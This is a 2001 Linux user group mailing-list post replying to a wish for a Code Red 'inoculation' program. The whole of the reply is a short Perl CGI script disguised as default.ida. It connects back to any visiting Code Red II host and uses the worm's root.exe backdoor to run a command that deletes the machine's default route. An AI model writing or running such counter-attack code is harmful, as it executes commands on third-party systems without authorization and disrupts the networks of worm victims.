[NCLUG] Code Red fun

J. Paul Reed preed at sigkill.com
Tue Aug 7 23:33:26 MDT 2001

On Tue, 7 Aug 2001, Charles Clarke wrote:

> I wish I had the time to write a "Code Red Worm Innoculation" program
> that I could use on the servers which contact mine.

The version of my fake default.ida I wrote after I sent the first one to
the list does exactly that (albeit, only for Code Red II boxes):

#!/usr/bin/perl

use Socket;

print "Content-type:text/html\n\n";

$socket = IO::Socket::INET->new(PeerAddr => $ENV{REMOTE_ADDR},
                                PeerPort => 80,
                                Proto   => "tcp",
                                Type    => SOCK_STREAM);

print $socket "GET /scripts/root.exe?/c+route+delete+0.0.0.0+>+fix_your_damn_r00ted_box";

close($socket);

Later,
Paul